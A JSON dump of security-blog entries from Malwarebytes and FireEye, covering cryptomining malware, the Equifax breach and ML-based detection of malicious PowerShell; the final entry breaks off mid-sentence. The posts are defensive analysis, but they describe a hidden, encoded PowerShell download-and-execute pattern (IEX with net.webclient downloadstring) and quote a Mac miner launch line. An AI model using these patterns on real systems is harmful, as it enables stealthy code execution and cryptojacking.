are witnessing.\n\nMalwarebytes has been blocking coin miners with its multiple protection modules, including our real-time scanner and web protection technology. Ever since September 2017, malicious cryptomining has been our top detection overall.\n\n### Cryptomining malware\n\nTo maximize their profits, threat actors are leveraging the computing power of as many devices as they can. But first, they must find ways to deliver the malicious coin miners on a large enough scale.\n\nWhile the Wannacry ransomware was highly publicized for taking advantage of the leaked EternalBlue and DoublePulsar exploits, at least [two different groups](<https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators>) used those same vulnerabilities to infect hundreds of thousands of Windows servers with a cryptocurrency miner, ultimately generating millions of dollars in revenue.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/IP__scan-1.png> \"\" )\n\n_Figure 1: Worm scanning random IP addresses on port 445 _\n\nOther vulnerabilities, such as a flaw with Oracle's WebLogic Server ([CVE-2017-10271](<https://www.cvedetails.com/cve/CVE-2017-10271/>)), were also used to deliver miners onto servers at [universities and research institutions](<https://www.ren-isac.net/public-resources/alerts/REN-ISAC_ADVISORY_Oracle_WebLogic_Vulnerability_Bitcoin_Miner_Attacks_20180105v1.pdf>). While Oracle released a [patch](<https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html>) in October 2017, many did not apply it in a timely fashion, and a [PoC](<https://github.com/Luffin/CVE-2017-10271>) only facilitated widespread abuse.\n\nAs it turns out, servers happen to be a favorite among criminals because they offer the most horsepower, or to use the proper term, the highest hash rate to crunch through and solve the mathematical operations required by cryptomining. In recent times, we saw individuals who, against their better judgement, took this to the next level by using supercomputers in various [critical infrastructure](<https://www.wired.com/story/cryptojacking-critical-infrastructure/>) environments.\n\n### Spam and exploit kits campaigns\n\nEven malware authors have caught the cryptocurrency bug. Existing malware families like Trickbot, distributed via malicious spam attachments, temporarily added in a [coin miner module](<https://twitter.com/VK_Intel/status/959194022735523841>).\n\nInterestingly, the Trickbot authors had already expanded their banking Trojan to [steal credentials from Coinbase users](<https://blogs.forcepoint.com/security-labs/trickbot-goes-after-cryptocurrency>) as they logged into their electronic wallet. The modular nature of their malware is certainly making it easier for them to experiment with new schemes to make money.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Spam-1.png> \"\" )\n\n_Figure 2: Document containing macro that downloads the TrickBot malware_\n\nSeveral exploit kits, and [RIG EK](<https://blog.malwarebytes.com/threat-analysis/2018/01/rig-exploit-kit-campaign-gets-deep-into-crypto-craze/>) in particular have been distributing miners, usually via the intermediary of the SmokeLoader malware. In fact, cryptominers are one of the most commonly served payloads in drive-by download attacks.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/RIG_miner-1.png> \"\" )\n\n_Figure 3: An iframe redirection to RIG EK followed by a noticeable coin miner infection_\n\n### Mobile and Mac cryptominers\n\nMobile users are not immune to cryptomining either, as [Trojanized apps laced with mining code](<https://blog.malwarebytes.com/cybercrime/2018/02/bogus-hack-apps-hack-users-back-for-cryptocash/>) are also commonplace, especially for the Android platform. Similarly to Windows malware, malicious APKs tend to have modules for specific functionalities, such as SMS spam and of course miners.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android-1.jpg> \"\" )\n\n_Figure 4: Source code for the mining component within an Android APK_\n\nLegitimate mining pools such as [Minergate](<https://en.bitcoin.it/wiki/MinerGate>) are often used by those Android miners, and the same is true for [Mac cryptominers](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-information-unfolds-regarding-mac-cryptominer/>). The usual advice on sticking to official websites to download applications applies but is not always enough, especially when [trusted applications get hacked](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Mac-1.png> \"\" )\n \n \n ~/Library/Apple/Dock -user sarahmayergo1990@gmail.com@gmail.com -xmr\n\n_Figure 5: Malicious Mac application launching a Monero miner_\n\n### Drive-by cryptomining\n\nIn mid-September 2017, a mysterious entity called Coinhive launched a new service that was about to create chaos on the web, as it introduced an API to mine the Monero currency directly within the browser.\n\nWhile in-browser miners have taken off because of Coinhive's popularity, they had already been tested a few years ago, mostly as proof-of-concepts that did not develop much further. There is, however, the legal precedent of a [group of students at MIT](<https://venturebeat.com/2014/02/12/new-jersey-slaps-mit-bitcoin-hackers-with-subpoena-and-theyre-fighting-back/>) who got sued by the state of New Jersey for their coin mining attempt\u2014called Tidbit\u2014proposed as an alternative to traditional display advertising.\n\n#### **No opt-in by default**\n\nWithin weeks, the Coinhive API, void of any safeguards, was abused in drive-by cryptomining attacks. Similar to drive-by downloads, [drive-by mining](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) is an automated, silent, and platform agnostic technique that forces visitors to a website to mine for cryptocurrency.\n\nWe witnessed an interesting [campaign](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) that was specifically designed for Android and drew millions of users to pages that immediately started to mine for Monero under the pretense of recouping server costs. Even though mobile devices aren't as powerful as desktops, let alone servers, this event showed that no one is immune to drive-by mining.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android_Drive_by-mining-1-1.png> \"\" )\n\n_Figure 6: An in-browser miner for Chrome on Android _\n\n[Malvertising](<https://blog.malwarebytes.com/threat-analysis/2017/09/drive-by-mining-and-ads-the-wild-wild-west/>) was once again a major factor in spreading coin miners to a large audience, as we saw with the [YouTube case](<https://twitter.com/Mystic_Ervo/status/956237422391709696>) that involved malicious ads via DoubleClick. Another interesting vector, which security people have warned about for years, is the use of third-party scripts that have become ubiquitous. A company called Texthelp had one of their [plugins compromised](<https://www.troyhunt.com/the-javascript-supply-chain-paradox-sri-csp-and-trust-in-third-party-libraries/>) and injected with a Coinhive script, leading to hundreds of government websites in the UK unwillingly participating in malicious cryptomining activity.\n\nTo fend off criticism, Coinhive introduced a new API (AuthedMine) that explicitly requires user input for any mining activity to be allowed. The idea was that considerate website owners would use this more \u201cethical\u201d API instead, so that their visitors can knowingly opt-in or out before engaging in cryptomining. This was also an argument that Coinhive put forward to defend its stance against ad blockers and antivirus products.\n\nWhile only Coinhive themselves would have accurate statistics, according to our own telemetry the opt-in version of their API was barely used (40K/day) in comparison to the silent one (3M/day), as pictured in the below histograms during the period of January 10 to February 6.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_opt-in-1.png> \"\" )\n\n_Figure 7: Usage statistics for the opt-in version of Coinhive_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_silent_drive-by-1.png> \"\" )\n\n_Figure 8: Usage statistics for the silent version of Coinhive_\n\nMoreover, even websites that do use the opt-in option may still be crippling machines by running an unthrottled miner, as was the case with popular[ American news website Salon](<https://twitter.com/jonathansampson/status/963465011153833984>)[[.]com](<https://twitter.com/jonathansampson/status/963465011153833984>).\n\n#### **Copycats**\n\nSeveral copycats emerged in the wake of Coinhive's immediate success. According to our stats, _coin-have[.]com_ is the second most popular service, followed by _crypto-loot[.]com_. While Coinhive takes a 30 percent commission on all mining earnings, Coin Have advertises the lowest commission rates in the market at 20 percent, although CryptoLoot itself claims to pay out 88 percent of mined commissions.\n\nIn additions to bigger payouts, other \u201cattractive\u201d features pushed by newcomers are low payment thresholds and the ability to bypass ad blockers, which they often view as their number one threat.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/copycats-1.png> \"\" )\n\n_Figure 9: Two of the most popular Coinhive copycats_\n\n#### **Browsers and technologies abused**\n\nContrary to malware-based coin miners, drive-by cryptomining does not require infecting a machine. This is both a strength and weakness in the sense that it can potentially reach a much wider audience but is also more ephemeral in nature.\n\nFor example, if a user navigates away from the website they are on or closes the offending tab, that will cause the mining activity to stop, which is a major drawback. However, we observed that some miners have developed sneaky ways of making drive-by mining [persistent](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>), thanks to the use of pop-unders, a practice well-known in the ad fraud business. To add insult to injury, the malicious pop-under tab containing the mining code would get placed right underneath the taskbar, rendering it virtually invisible to the end user. Thanks to this trick, the mining can carry on until the user actually restarts their computer.\n\nAnother way to mine for long and uninterrupted periods of time is by using a booby-trapped browser extension that will inject code in each web session. This is what happened to the Archive Poster extension because one of their developers had his Google account credentials compromised.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/extension-1.png> \"\" )\n\n_Figure 10: The compromised extension with a rogue JavaScript for Coinhive_\n\nIt is worth noting that JavaScript is not the only way to mine for coins within the browser. Indeed, we have observed WebAssembly, a newer format available in modern browsers, being used more and more. WebAssembly modules have the advantage of running at near native speed, making them a lot faster and more efficient than JavaScript.\n \n \n | payload =\n \u00a0 - [ ExportSection\n \u00a0\u00a0\u00a0 | count = 27\n \u00a0\u00a0\u00a0 | entries =\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 9\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"stackSave\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 71\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 17\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"_cryptonight_hash\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 70\n\n_Figure 11: Code snippet from a WebAssembly module designed for mining Monero_\n\nWhile drive-by mining typically happens via the standard HTTP protocol\u2014either via HTTP or HTTPS connections\u2014we have witnessed more and more examples of miners communicating via WebSockets instead.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/websocket_-1.png> \"\" )\n\n_Figure 12: A Web Socket connection to Coinhive_\n\nA WebSocket is another communication protocol that allows streams of data to be exchanged. There is an initial handshake request and response with a remote server followed by the actual data streams. Coin mining code wrapped within a secure (wss) WebSocket is more difficult to identify and block.\n\n### Conclusion\n\nAs the threat landscape continues to evolve, its connections to real-world trends become more and more obvious. Malware authors are not only enjoying the relative anonymity provided by digital currencies but also want to amass them.\n\nCryptomining malware provides a good use case for leveraging the size and power of a botnet in order to perform CPU-intensive mining tasks without having to bear the costs incurred in the process. In some aspect, drive-by mining also applies the same concept, except that the botnet of web users it creates is mostly temporary.\n\nWhile malicious cryptomining appears to be far less dangerous to the user than ransomware, its effects should not be undermined. Indeed, unmanaged miners could seriously disrupt business or infrastructure critical processes by overloading systems to the point where they become unresponsive and shut down. Under the disguise of a financially-motivated attack, this could be the perfect alibi for advanced threat actors.\n\nMalwarebytes users, regardless of their platform, are protected against unwanted cryptomining, whether it is done via malware or the web.\n\nThe post [The state of malicious cryptomining](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-02-26T16:08:03", "type": "malwarebytes", "title": "The state of malicious cryptomining", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-02-26T16:08:03", "href": "https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/", "id": "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-14T17:30:57", "description": "### [updates 9/14/2017]\n\nEquifax has released information and confirmed the vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) that was used in this breach after several days of intense scrutiny around Apache Struts. To make matters worse, there already was a patch available for this flaw in March 2017, two months prior to the incident.\n\n_**1) Updated information on U.S. website application vulnerability.**_ \n_Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement._\n\n### [updates 9/12/2017]\n\nEquifax's efforts in response to this incident can be followed at www.equifaxsecurity2017.com, but the[ site has been called](<https://krebsonsecurity.com/2017/09/equifax-breach-response-turns-dumpster-fire/>) \"completely broken at best, and little more than a stalling tactic or sham at worst.\" And [ isn\u2019t working for many people](<https://www.businessinsider.nl/equifax-data-breach-site-check-angry-response-2017-9/>). So, we leave it up to your best judgment whether you should pay that site a visit .\n\nOver 30 lawsuits have been filed against Equifax following the breach [according to Reuters](<http://www.reuters.com/article/us-equifax-cyber-lawsuits/lawsuits-against-equifax-pile-up-after-massive-data-breach-idUSKCN1BM2E3>).\n\n[Quartz reported](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) that the vulnerability they mentioned was in a popular open-source software package called Apache Struts, which is a programming framework for building web applications in Java. Two vulnerabilities in Struts have been discovered so far in 2017. The vulnerability announced on Sept. 4 has existed in Struts since 2008.\n\nApache responded to that report with [this Apache Struts Statement on Equifax Security Breach](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>).\n\n \n\nOn July 29, 2017, Equifax discovered that attackers had gained unauthorized access to private data belonging to an estimated 143 million Americans by exploiting a vulnerability in a website application. It is unknown at this point whether said vulnerability was a zero-day or had already been patched. The former would indicate that other companies could have also been attacked, while the latter would reflect on Equifax's overall security posture.\n\n[According to Equifax](<https://www.equifaxsecurity2017.com/frequently-asked-questions/>), online criminals maintained their presence from mid-May through July 2017 and had access to:\n\n * Names\n * Social Security numbers\n * Birth dates\n * Addresses\n * Driver\u2019s license numbers (in some cases)\n * Credit card numbers (for approx. 209,000 U.S. consumers)\n\nIt also said that some personal information for certain UK and Canadian residents was part of this breach.\n\nThis is obviously bad news for consumers and it will only increase the lack of trust they have towards corporations that collect and store their data. It also serves as a reminder that there are ways to be proactive and exercise your right to have access to your information and put certain restrictions in place to make identity theft harder.\n\nEquifax is offering a free identity theft protection and credit file monitoring to all of its U.S. customers while still investigating the intrusion, working along with a private firm and law enforcement. More information about this breach and how to apply for ID theft protection can be found by going to [equifaxsecurity2017.com](<https://www.equifaxsecurity2017.com/>), a website Equifax has just set up.\n\nThe post [Equifax breach: What you need to know [updated]](<https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-08T07:02:47", "title": "Equifax breach: What you need to know [updated]", "type": "malwarebytes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-09-08T07:02:47", "id": "MALWAREBYTES:4993027161793E66024E0B42522BB53D", "href": "https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2018-08-31T00:18:22", "description": "#### Introduction****\n\nCyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to [install backdoors](<https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html>), [execute malicious code](<https://www.csoonline.com/article/3227046/malware/what-is-a-fileless-attack-how-hackers-invade-systems-without-installing-software.html>), and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.\n\nIn this post you will learn:\n\n * Why malicious PowerShell can be challenging to detect with a traditional \u201csignature-based\u201d or \u201crule-based\u201d detection engine.\n * How Natural Language Processing (NLP) can be applied to tackle this challenge.\n * How our NLP model detects malicious PowerShell commands, even if obfuscated.\n * The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.\n\n#### Background****\n\nPowerShell is one of the most [popular tools](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).\n\n \nFigure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 \u2013 blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series\n\nFireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the [tactics, techniques and procedures (TTPs) used in PowerShell attacks](<https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf>), as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to [improve PowerShell logging](<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>), which gives greater visibility into potential attacker activity. More recently, our in-depth report on [APT32](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.\n\n \nFigure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain\n\nLet\u2019s take a deep dive into an example of a malicious PowerShell command (Figure 3).\n\n \nFigure 3: Example of a malicious PowerShell command\n\nThe following is a quick explanation of the [arguments](<https://docs.microsoft.com/en-us/powershell/scripting/powershell-scripting?view=powershell-6>):\n\n * -NoProfile \u2013 indicates that the current user\u2019s profile setup script should not be executed when the PowerShell engine starts.\n * -NonI \u2013 shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.\n * -W Hidden \u2013 shorthand for \u201c-WindowStyle Hidden\u201d, which indicates that the PowerShell session window should be started in a hidden manner.\n * -Exec Bypass \u2013 shorthand for \u201c-ExecutionPolicy Bypass\u201d, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn\u2019t meant to be a security boundary.\n * -encodedcommand \u2013 indicates the following chunk of text is a base64 encoded command.\n\nWhat is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.\n\n \nFigure 4: The decoded command for the aforementioned example\n\nInterestingly, the decoded command unveils a stealthy fileless network access and remote content execution!\n\n * _IEX_ is an alias for the _Invoke-Expression_ cmdlet that will execute the command provided on the local machine.\n * **The _new-object_** cmdlet creates an instance of a .NET Framework or COM object, here a _net.webclient_ object.\n * The _downloadstring_ will download the contents from &lt;url&gt; into a memory buffer (which in turn _IEX_ will execute).\n\nIt\u2019s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting [CVE-2017-10271 to deliver a cryptocurrency miner](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>). This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.\n\nThere are several reasons why adversaries prefer PowerShell:\n\n 1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.\n 2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.\n 3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.\n\nAdditionally, from an economics perspective:\n\n * Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with [open source obfuscation tools](<https://www.fireeye.com/blog/threat-research/2017/07/revoke-obfuscation-powershell.html>).\n * Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.\n\nNext, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.\n\n#### Natural Language Processing for Detecting Malicious PowerShell****\n\nCan we use machine learning to predict if a PowerShell command is malicious?\n\nOne advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.\n\nAfter we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.\n\nOne of the technical challenges we tackled was** **synonym, a problem studied in linguistics. For instance, \u201cNOL\u201d, \u201cNOLO\u201d, and \u201cNOLOGO\u201d have identical semantics in PowerShell syntax. In NLP, a [stemming](<https://en.wikipedia.org/wiki/Stemming>) algorithm will reduce the word to its original form, such as \u201cInnovating\u201d being stemmed to \u201cInnovate\u201d.\n\nWe created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as [trie](<https://en.wikipedia.org/wiki/Trie>), as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.\n\n \nFigure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)\n\nThe overall NLP pipeline we developed is captured in the following table:\n\nNLP Key Modules\n\n| \n\nFunctionality \n \n---|--- \n \nDecoder\n\n| \n\nDetect and decode any encoded text \n \nNamed Entity Recognition (NER)\n\n| \n\nDetect and recognize any entities such as IP, URL, Email, Registry key, etc. \n \nTokenizer\n\n| \n\nTokenize the PowerShell command into a list of tokens \n \nStemmer\n\n| \n\nStem tokens into semantically identical token, uses trie \n \nVocabulary Vectorizer\n\n| \n\nVectorize the list of tokens into machine learning friendly format \n \nSupervised classifier\n\n| \n\nBinary classification algorithms:\n\n * Kernel Support Vector Machine\n * Gradient Boosted Trees\n * Deep Neural Networks \n \nReasoning\n\n| \n\nThe explanation of why the prediction was made. Enables analysts to validate predications. \n \nThe following are the key steps when streaming the aforementioned example through the NLP pipeline:\n\n * Detect and decode the Base64 commands, if any\n * Recognize entities using Named Entity Recognition (NER), such as the &lt;URL&gt;\n * Tokenize the entire text, including both clear text and obfuscated commands\n * Stem each token, and vectorize them based on the vocabulary\n * Predict the malicious probability using the supervised learning model\n\n \nFigure 6: NLP pipeline that predicts the malicious probability of a PowerShell command\n\nMore importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.\n\n \nFigure 7: End-to-end machine learning production pipeline for PowerShell machine learning\n\n#### Value Validated in the Field****\n\nWe successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:\n\n * Commodity malware such as Kovter.\n * Red team penetration test activities.\n * New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.\n\nThe unique values brought by the PowerShell machine learning detection engine include: \n\n * The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.\n * The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.\n\nThe ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.\n\n#### Acknowledgements\n\nWe would like to acknowledge:\n\n * Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.\n * Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.\n * Research endpoint support from Caleb Madrigal.\n * The FireEye ICE-DS Team.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-10T12:00:00", "type": "fireeye", "title": "Malicious PowerShell Detection via Machine Learning", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-07-10T12:00:00", "id": "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "href": "https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2021-11-04T00:24:38", "description": "#### Introduction\n\nCyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This [interest has increased in recent years](<https://www.fireeye.com/blog/threat-research/2018/04/cryptocurrencies-cyber-crime-blockchain-infrastructure-use.html>), stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.\n\nThis blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.\n\n#### What Is Mining?\n\nAs transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into \"blocks\" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the \"chain\" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called \"pools\" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.\n\n \nFigure 1: The role of miners\n\n#### Underground Interest\n\nFireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.\n\n \nFigure 2: Underground keyword mentions\n\n#### Monero Is King\n\nThe majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called \"ring signatures,\" which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.\n\nThe Monero blockchain also uses what's called a \"memory-hard\" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.\n\n#### Underground Advertisements for Miners\n\nBecause most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ 